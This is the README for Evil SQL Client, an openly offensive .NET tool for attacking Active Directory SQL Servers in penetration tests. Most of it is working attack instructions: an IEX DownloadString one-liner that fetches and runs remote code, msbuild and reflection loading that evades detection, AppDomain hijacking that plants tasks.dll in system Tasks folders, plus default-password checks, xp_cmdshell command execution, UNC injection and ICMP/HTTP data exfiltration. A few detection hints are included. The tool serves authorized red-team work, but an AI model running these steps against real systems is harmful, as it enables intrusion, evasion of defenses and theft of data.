--------------------------
Evil SQL Client (ESC)
Version: v1.0
Author: Scott Sutherland (@_nullbind), NetSPI 2020
Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting Active Directory domain joined SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.
Most of ESC's functionality is based on the PowerUpSQL, DAFT, SQLC2, and SQLInjectionWiki projects which are also related to SQL Server. At the moment ESC does not have full feature parity with the PowerUpSQL or DAFT, but the most useful bits are there.
Below is a summary of what is covered in this readme:
Execution Options
- Compile source and run via exe
- Download release and run via exe
- Download and run through MSBuild
- Download and run through PowerShell
- Download and run through AppDomain Hijacking
Command Options
- Supported Commands (HELP)
- Discovery Command Examples
- Access Check Command Examples
- Query Single Target
- Query Multiple Targets
- Privilege Escalation Command Examples
- Exfiltration Command Examples
- Pending Commands
Detections
- MSBuild Tests: Resource1
- MSBuild Detection: Resource1 | Resource2
- SQL Server Detection: Resource1
- AppDomain Detection - Consider monitoring for tasks.dll being written to c:\Windows\SysWow64\Tasks\ and c:\Windows\System32\Tasks, affected files being copied out of system and program file directories, or the "APPDOMAIN_MANAGER_TYPE" and "COMPLUS_Version" environmental variables being set via the command line or via scripting engines. Disclaimer: I haven't tested the AppDomain detections on scale so I dont know how much white noise they will produce.
Execution Options
Below is a list of options for running the Evil SQl Client (ESC).
Compile Source and Run Exe
- Download the source from esc folder.
- Open the esc.sln file in Visual Studio.
- Select Build -> Build Solution.
- Run esc.exe.
Download Release and Run Exe
- Download compiled esc.exe from releases.
- Run esc.exe.
Download and Run through MSbuild.exe
Evil SQL Client console can be run through msbuild inline tasks using the esc.csproj file or esc.xml file.
Using msbuild.exe to execute .net code through inline tasks is a technique that was researched and popularized by Casey Smith.
esc.proj
esc.proj includes all of the original Evil SQL Client (ESC) C Sharp source code inline. The inline .NET source code technique used in this variation seems to do a better job of avoiding detection than embedding the exe and calling through reflection.
esc.xml
esc.xml works a little differently and has the entire esc.exe hardcoded as a string which is then loaded through reflection using a technique highlighted in the GhostBuild project by @bohops. I should note that Windows Defender is pretty good at identifying this exe wrapping technique out of the box.
Updating esc.xml:
To update the esc.xml follow the instructions below:
- Download and compile esc.exe.
- Run Out-Compressdll (by @mattifestation) against esc.exe.
Out-CompressedDll -FilePath esc.exe | out-file output.txt
- Replace the compressedBin string in esc.xml with the "EncodedCompressedFile" string generated from Out-CompressDll.
- Replace compressedBinSize with the size generated from Out-CompressDll.
- Run the script.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe esc.xml
Execution Examples
Below are a few execution examples. Msbuild can accept a filepath on the command line, but no filepath is required if only one .csproj file exists in the directory your executing msbuild.exe from.
In the examples below, esc.csproj has been renamed to 1.csproj:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe esc.csproj
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe esc.xml
Download and Run Functions through PowerShell
Below are some quick instructions for running ESC functions through PowerShell.
- Download esc.exe.
- Open PowerShell and load esc.exe through reflection.
[System.Reflection.Assembly]::LoadFile("c:\temp\esc.exe")
- Alternatively, esc-example.ps1 contains a portable example generated using Out-Compressdll. It can be loaded using the PowerShell command below.
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/ESC/master/esc-example.ps1")
- After the assmbly is loaded you can run the desired function. Examples below.
[evilsqlclient.Program+EvilCommands]::GetSQLServersBroadCast() [evilsqlclient.Program+EvilCommands]::GetSQLServersSpn() [evilsqlclient.Program+EvilCommands]::MasterDiscoveredList [evilsqlclient.Program+EvilCommands]::InstanceAllG = "enabled" [evilsqlclient.Program+EvilCommands]::CheckAccess() [evilsqlclient.Program+EvilCommands]::MasterAccessList [evilsqlclient.Program+EvilCommands]::CheckDefaultAppPw() [evilsqlclient.Program+EvilCommands]::CheckLoginAsPw() [evilsqlclient.Program+EvilCommands]::MasterAccessList
Download and Run through AppDomain Hijacking
Application domains provide an isolation boundary for security, reliability, and versioning, and for unloading .NET assemblies. Application domains are typically created by runtime hosts, which are responsible for bootstrapping the common language runtime before an application is run. A typical application loads several assemblies into an application domain before the code they contain can be executed. The default AppDomainManager can be replaced by setting the APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environmental variables. This provides users with the means load and execute .NET code from custom assemblies prior to the execution of the intended application, but within their process and thread.
Reference: https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains
It is possible to leverage that functionality and default write access to the c:\windows\system32\tasks\ directory to execute arbitrary .NET code through c:\windows\system32\ and c:\windows\SysWow64\ assemblies that import mscoree.dll. This technique was originally shared during Casey Smith's DerbyCon presentation ".Net Manifesto - Win Friends and Influence the Loader".
Below are instructions for executing ESC using this method.
- Compile esc-appdomain-hijack.cs to tasks.dll.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.Reflection.dll /r:System.IO.Compression.dll /r:System.Runtime.InteropServices.dll /r:System.EnterpriseServices.dll /target:library /out:tasks.dll esc-appdomain-hijack.cs
- Update environment variables. Note: process, user, or system could be targeted.
set APPDOMAIN_MANAGER_ASM=tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null set APPDOMAIN_MANAGER_TYPE=Esc set COMPLUS_Version=v4.0.30319
- Copy tasks.dll to target directories.
copy tasks.dll C:\Windows\System32\Tasks\tasks.dll copy tasks.dll C:\Windows\SysWow64\Tasks\tasks.dll
- Identify .exe in c:\windows\system32\ that load mscoreee.dll. This can be done quickly using the Get-PE function from Matt Graeber's PowerShell Arsenal Project.
gci c:\windows\system32\*.exe | get-pe | where-object {$_.Imports.ModuleName -Contains "mscoree.dll"} | Select ModuleName -ExpandProperty modulename
- Choose one of the affected commands and run it.
Examples: C:\windows\system32\acu.exe C:\windows\system32\aitstatic.exe C:\windows\system32\ClusterUpdateUI.exe C:\windows\system32\dsac.exe C:\windows\system32\FileHistory.exe C:\windows\system32\LbfoAdmin.exe C:\windows\system32\Microsoft.Uev.SyncController.exe C:\windows\system32\mtedit.exe C:\windows\system32\PresentationHost.exe C:\windows\system32\RAMgmtUI.exe C:\windows\system32\ScriptRunner.exe C:\windows\system32\ServerManager.exe C:\windows\system32\ShieldingDataFileWizard.exe C:\windows\system32\stordiag.exe C:\windows\system32\SynapticsUtility.exe C:\windows\system32\TemplateDiskWizard.exe C:\windows\system32\TsWpfWrp.exe C:\windows\system32\UevAgentPolicyGenerator.exe C:\windows\system32\UevAppMonitor.exe C:\windows\system32\UevTemplateBaselineGenerator.exe C:\windows\system32\UevTemplateConfigItemGenerator.exe C:\windows\system32\Vmw.exe
This can also be done by copying the affected EXE and the tasks.dll to a directory that's writable by the user. To detect those scenarios, consider monitoring for files being copied from system directories. However, note that attackers may be able to identify other affected EXEs on the system using the same discovery technique listed above.
Using the steps below ESC can also be executed using cscript.exe once the tasks.dll has been written to disk. Once again, based on Casey Smith's templates.
- Create the file trigger.js with the content below.
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'c:\\Windows\\System32\\Tasks'; new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = 'tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'; new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = 'Esc'; var o = new ActiveXObject("System.Object");
- Execute it using cscript.exe.
cscript trigger.js
Note: Detections could include monitoring for tasks.dll being written to C:\Windows\System32\Tasks\tasks.dll and C:\Windows\SysWow64\Tasks\tasks.dll. Also, potentially the execution of the commands above without/with parameters.
ESC can also be executed through AppDomain hijacking using a configuration file.
- Create a configuration file in same folder as the target assembly, and name it after the target binary. Example below.
ScriptRunner.exe.config
- Below is sample XML for the config file.
<configuration>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<probing privatePath="C:\Windows\Tasks"/> </assemblyBinding>
<appDomainManagerAssembly value="Tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null" />
<appDomainManagerType value="Esc" />
</runtime>
</configuration>
- Run the target binary.
ScriptRunner.exe
Note: Alternatively, the assemblyBinding and probing tags can be removed from the configuration file and replaced with the tag within the runtime tag. If that tag is present in the configuration file, the .NET application will attempt to use the DEVPATH environmental variable as a search path for referenced assemblies. As such, it can be used as an alternative to probing.
Supported Commands
COMMAND LIST
SHOW: show settings Show connection and exfil settings. show discovered Show discovered instances. show access Show accessible instances, versions, and other information. show help Show this help page. CONFIGURE INSTANCE: set targetall Target all accessible SQL Server instances. List with 'show access' command. set instance instancename Target a single instance. Instance formats supported include: server1 server1\instance1 server1,1433 set connstring stringhere Set a custom connection string. Examples below. Server=Server\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1 Server=Server\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1;uid=Domain\Account;pwd=Password; Server=Server\Instance;Database=Master;Connection Timeout=1;User ID=Username;Password=Password CONFIGURE CREDENTIALS: set username username User for authenticatiing to SQL Server instances. Defaults to current Windows user if no username or password is provided, but access SQL Login credentials. set password password Password for the provided username. Defaults to current Windows user if no user or password is provided. QUERY COMMANDS: set timeout 1 Set query timeout. Useful over slow connections. query Arbitrary TSQL query can be executed once a valid connection string is configured. To run against all accessible instances type 'set targetall enabled'. Type the query, then go, and press enter. Multi-line queries are supported. Note: You don't have to type the word 'query'. Example: SELECT @@VERSION GO DISCOVERY COMMANDS: discover broadcast Discover SQL Server instances via a broadcast request. discover domainspn Discover SQL Server instances via LDAP query to the default DC for MSSQL SPNs. discover file filepath Discover SQL Server instance listed in a file. One per line. Format examples: hostname hostname\instance hostname,port show discovered Display the list of discovered SQL Server instances. export discovered outpath Export the list of discovered SQL Server instances to a file. Example: export discovered c:\windows\temp\sqlinstances.txt clear discovered Clear list of discovered SQL Server instances. INITAL ACCESS COMMANDS: check access Attempts to log into all discovered SQL Server instances. Uses current Windows/Domain user by default. Note: Will use alternative credentials if provided. (set username / set password) show access List SQL Server instances that can be logged into. export access outpath Export list of SQL Server instances that can be logged into to a file. clear access Clear the in memory list of SQL Server instances that can be logged into. check defaultlogins Attempts to identify SQL Server instances that match known application and attempts the associate usernames and passwords. POST EXPLOITATION COMMANDS: list serverinfo List server information for accessoble target SQL Server instances. list databases List databases for accessoble target SQL Server instances. list tables List tables information for accessoble target SQL Server instances. Limits results to databases the login user has access to. list links List links information for accessoble target SQL Server instances. list logins List logins information for accessoble target SQL Server instances. list rolemembers List rolemember information for accessoble target SQL Server instances. list privs Check accessible target SQL Server instances for logins that use their login as a password. check loginaspw Check accessible target SQL Server instances for logins that use their login as a password. check uncinject IP Connect to taret SQL Server instance and perform UNC injection back to provide IP. run OSCMD command Run os command through xp_cmdshell on the accessible target SQL Server instances. *Requires sysadmin privileges. CONFIGURE DATA EXFILTRATION: set file enabled set filepath c:\temp\file.csv set icmp tenabled set icmpip 127.0.0.1 set http enabled set httpurl http://127.0.0.1 set encrypt enabled set enckey MyKey! set encsalt MySalt! MISC COMMANDS: help clear exit
Common Command Sequences
Below are some common command examples to get you started.
Discovering SQL Server Instances
Below are a few common methods to identify SQL Server on the network and domain without port scanning.
Checking Access to Discovered Instances
After discovery, check access
can be used to determine if the current or provided credentials can login into the discovered SQL Server instances.
set targetall enabled
show settings
Query Single Target
Below are commands that can be used to target and query a single SQL Server instance.
First configure ESC to target a single instance. This will automatically disable the "targetall" setting.
Set target MSSQLSRV04\SQLSERVER2014
Set username backdoor_account
Set password backdoor_account
Show settings
Next simply execute your query and end your TSQL with the keyword "go".
select @@version
go
You can also run "list" and other post exploitation commands against the target instance.
Query Multiple Targets
Below are commands that can be used to target and query all accessible SQL Server instances.
- Import a list of target instances with the
discover file
,discover domainspn
, ordiscover broadcast
commands. - Identify which instances you can log into.
check access
- Enable multi instance targeting using the command below. Once enabled all commands and queries will be run against all accessible SQL Server instances.
set targetall enabled
show settings
- Run query as normal.
select @@version
go
Testing for Common Password Issues
Below are some checks for common password issues that can be used to gain initial entry and escalate privileges in some environments.
If "targetall" is enabled the commands below with target all discovered or accessible instances. However, if a single instance is provided, then "targetall" will automatically be disabled to ensure only the one instance is targeted.
check defaultpw
check defaultpw
is run against discovered instances and does not require valid credentials.
Related Reading
check loginaspw
check loginaspw
can be used once authenticated to enumerated all logins and test if they are using the login as the password.
Related Reading
Running OS Commands
Below is a ESC command for running OS commands on target instances. It requires sysadmin privileges.
Saving List of Accessible Servers
The command below can be used to export a list of servers that you can log into.
export access c:\temp\access.csv
Data Exfiltration Example: Local File
Below is an example of how to exfiltrate data to a local file.
set file enabled
set filepath c:\temp\output.csv
Data Exfiltration Example: ICMP
Below is an example of how to exfiltrate data over ICMP with ESC.
set icmp enabled
set icmpip 192.168.1.1
Pending Commands
- Add logging w/ timestamps
- Add discover local
- Add discover udpscan
- Add column find
- Add domain account enumeration
- Add link crawl + linkquery + linkoscmd
- Add escalate dbowner
- Add escalate imperonsate
- Threading
- Finish data encryption
- Create python/powershell script to decrypt encrypted exfiltrated data
- Rewrite query function to be more flexible
Pending fixes
- Crashes when you just type go
- Crashes when you type ctrl+c
Thank You
Below is a list of people who tested out esc and/or provided .net development guidance. Thanks for all the help!
- Alexander Leary (@0xbadjuju)
- Ivan Da Silva (@humble_desser)
- Josh Weber
- Kevin Robertson (@kevin_robertson)